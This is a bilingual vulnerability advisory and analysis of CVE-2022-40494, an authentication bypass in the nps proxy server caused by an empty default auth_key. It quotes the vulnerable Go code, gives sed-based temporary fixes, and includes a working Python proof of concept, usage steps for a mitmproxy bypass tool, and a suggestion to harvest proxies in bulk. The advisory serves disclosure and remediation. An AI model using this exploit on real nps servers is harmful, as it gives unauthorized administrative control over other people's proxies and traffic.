

CVE-2022-40494

Web CVE

 Vulnerability

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nps Authentication Bypass

- Affected product: V0.19.0<=nps<=V0.26.10
- Attack type: Remote
- Vulnerability Type: Incorrect Access Control
- Affected component: /nps/web/controllers/base.go
- Description: nps<=v0.26.10 was discovered to contain a authentication bypass vulnerability via constantly generating and sending the Auth key and Timestamp parameters. Hackers can gain access to proxy information and control traffic through this vulnerability.

POC

A tool from github <https://github.com/carr0t2/nps-auth-bypass>



Details

In /nps/web/controllers/base.go

Executable File | 207 lines (190 sloc) | 5.58 KB

Raw | Blame

```
1 package controllers
2
3 import (
4     "html"
5     "math"
6     "strconv"
7     "strings"
8     "time"
9
10    "ehang.io/nps/lib/common"
11    "ehang.io/nps/lib/crypt"
12    "ehang.io/nps/lib/file"
13    "ehang.io/nps/server"
14    "github.com/astaxie/beego"
15 )
16
17 type BaseController struct {
18     beego.Controller
19     controllerName string
20     actionName      string
21 }
22
23 //初始化参数
24 func (s *BaseController) Prepare() {
25     s.Data["web_base_url"] = beego.AppConfig.String("web_base_url")
26     controllerName, actionName := s.GetControllerAndAction()
27     s.controllerName = strings.ToLower(controllerName[0 : len(controllerName)-10])
28     s.actionName = strings.ToLower(actionName)
29     // web api verify
30     // param 1 is md5(authKey+Current timestamp)
31     // param 2 is timestamp (It's limited to 20 seconds.)
32     md5Key := s.GetEscapeString("auth_key")
33     timestamp := s.GetIntNoErr("timestamp")
34     configKey := beego.AppConfig.String("auth_key")
35     timeNowUnix := time.Now().Unix()
36     if !(md5Key != "" && (math.Abs(float64(timeNowUnix-int64(timestamp))) <= 20) && (crypt.Md5(configKey+strconv.Itoa(timestamp))) == md5Key) {
37         if s.GetSession("auth") != true {
38             s.Redirect(beego.AppConfig.String("web_base_url")+"/login/index", 302)
39         }
40     } else {
41         s.SetSession("isAdmin", true)
42         s.Data["isAdmin"] = true
43     }
44     if s.GetSession("isAdmin") != nil && !s.GetSession("isAdmin").(bool) {
45         s.Ctx.Input.SetData("client_id", s.GetSession("clientId").(int))
46         s.Ctx.Input.SetParam("client_id", strconv.Itoa(s.GetSession("clientId").(int)))
47         s.Data["isAdmin"] = false
48         s.Data["username"] = s.GetSession("username")
49         s.CheckUserAuth()
```

In /nps/nps.conf

```
45 web_open_ssl=false
46 web_cert_file=conf/server.pem
47 web_key_file=conf/server.key
48 # if web under proxy use sub path. like http://host/nps need this.
49 #web_base_url=/nps
50
51 #Web API unauthenticated IP address(the len of auth_crypt_key must be 16)
52 #Remove comments if needed
53 #auth_key=test
54 auth_crypt_key =1234567812345678
55
56 #allow_ports=9001-9009,10001,11000-12000
57
58 #Web management multi-user login
59 allow_user_login=false
60 allow_user_register=false
61 allow_user_change_username=false
62
```

The auth key in the configuration file is annotated by default, so it is empty

Webapi's `auth_key` is calculated through the `auth_key` and `timestamp` in the configuration file, so you can dynamically generate Webapi's `auth_key`

The last to get into the website backstage

Temporary Fixes



shell  ^

```
sed -i "s/auth_crypt_key =1234567812345678/auth_crypt_key=$(head /dev/urandom | tr -dc a-f0-9 | head -c 16)/" /etc/nps/conf/nps.conf
sed -i "s/#auth_key=test/auth_key=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 32)/" /etc/nps/conf/nps.conf
```

nps认证绕过漏洞分析

环境搭建

项目地址 <https://github.com/ehang-io/nps>



```
git clone https://github.com/ehang-io/nps --depth 1
```

```
cd nps
```

```
docker run -it --name nps --net=host -v /root/github/nps/conf:/conf
```

```
ffdfgdfg/nps # 记得改挂载路径
```

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漏洞成因

源于错误的用户配置

nps有web api功能(文档: <https://github.com/ehang-io/nps/blob/master/docs/api.md>)

该功能默认开启

默认配置如下 `/etc/nps/conf/nps.conf:53`


none  ^

```
#auth_key=test
```

```
auth_crypt_key =1234567812345678
```

影响范围

V0.19.0<=nps<=V0.26.10

临时修复方法

修改配置文件, 只有这个才能临时完全修复 (网上许多说法讲的不全)

(去掉 `auth_key` 注释 && 修改 `auth_key` 为随机字符串 && 修改 `auth_crypt_key` 为长度为16的十六进制随机字符串) || (去掉 `auth_key` 注释 && 修改 `auth_key` 为随机字符串 && 注释 `auth_crypt_key`)


shell  ^

```
sed -i "s/auth_crypt_key =1234567812345678/auth_crypt_key=$(head /dev/urandom | tr -dc a-f0-9 | head -c 16)/" /etc/nps/conf/nps.conf
```



```
sed -i "s/#auth_key=test/auth_key=$(head /dev/urandom | tr -dc A-Za-z0-9 |  
head -n 32)/" /etc/nps/conf/nps.conf
```

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正式修复办法

(等开发者)

首次运行时生成随机字符串

或者检测 `auth_key` 配置为123或为空时,跳到登录页面

原理分析

代码分析

在/nps/web/controllers/base.go



```
Carrot2
Editable File 107 lines (190 sloc) 5.58 KB
Raw Blame

1 package controllers
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3 import (
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33     timestamp := s.GetIntNoErr("timestamp")
34     configKey := beego.AppConfig.String("auth_key")
35     timeNowUnix := time.Now().Unix()
36     if !(md5Key != "" && (math.Abs(float64(timeNowUnix-int64(timestamp))) <= 20) && (crypt.Md5(configKey+strconv.Itoa(timestamp))) == md5Key) {
37         if s.GetSession("auth") != true {
38             s.Redirect(beego.AppConfig.String("web_base_url")+"/login/index", 302)
39         }
40     } else {
41         s.SetSession("isAdmin", true)
42         s.Data["isAdmin"] = true
43     }
44     if s.GetSession("isAdmin") != nil && !s.GetSession("isAdmin").(bool) {
45         s.Ctx.Input.SetData("client_id", s.GetSession("clientId").(int))
46         s.Ctx.Input.SetParam("client_id", strconv.Itoa(s.GetSession("clientId").(int)))
47         s.Data["isAdmin"] = false
48         s.Data["username"] = s.GetSession("username")
49         s.CheckUserAuth()
50     }
51 }
```

32行从url参数中获取 `auth_key` (key和时间戳hash过的结果)

33行从url参数中获取 `timestamp`

34行从配置中获取 `auth_key` , 默认配置下, `auth_key` 被注释, 所以返回为nil

35行获取当前本地时间戳

36行判断 (字符串不等于空字符串 && 当前本地时间与33行时间相差小于20s && 配置文件的 `authkey` 与当前时间戳生成的hash与32行传入的 `auth_key` 是否相等)

如果满足的话即可成为admin，进入后台



构造过程

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那么只需要满足36行的各个条件

第一个 `md5Key != ""` 恒为真

第二个 时间戳本地实时生成

第三个 因为 `auth_key` 默认为空，所以只需要本地对时间戳md5即可

所以构造非常简单，以下为python代码

poc



python ^

```
import requests
import time
import hashlib

now_timestamp = str(int(time.time()))
auth_key = hashlib.md5(now_timestamp.encode()).hexdigest()

burp0_url = f"http://xxx/?auth_key={auth_key}&timestamp={now_timestamp}"
r = requests.get(burp0_url)
if "title-admin" in r.text:
    print("Success")
```

工具

假如需要访问web界面进入后台，需要每20s生成 `timestamp` 和 `auth_key`

所以这里使用 `mitmproxy` 作为中间人，自动生成并插入 `timestamp` 和 `auth_key`

我已经写好了工具上传至github <https://github.com/carr0t2/nps-auth-bypass>

使用方法

web端 可以直接在浏览器访问后台



```
git clone https://github.com/carr0t2/nps-auth-bypass
```

```
cd nps-auth-bypass
```

```
mitmdump -s main.py -p 8000 --ssl-insecure --mode reverse:http://x.x.x.x:x/
```

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浏览器访问 <http://127.0.0.1:8000/>

其他脚本

可以联动fofax批量获取代理等

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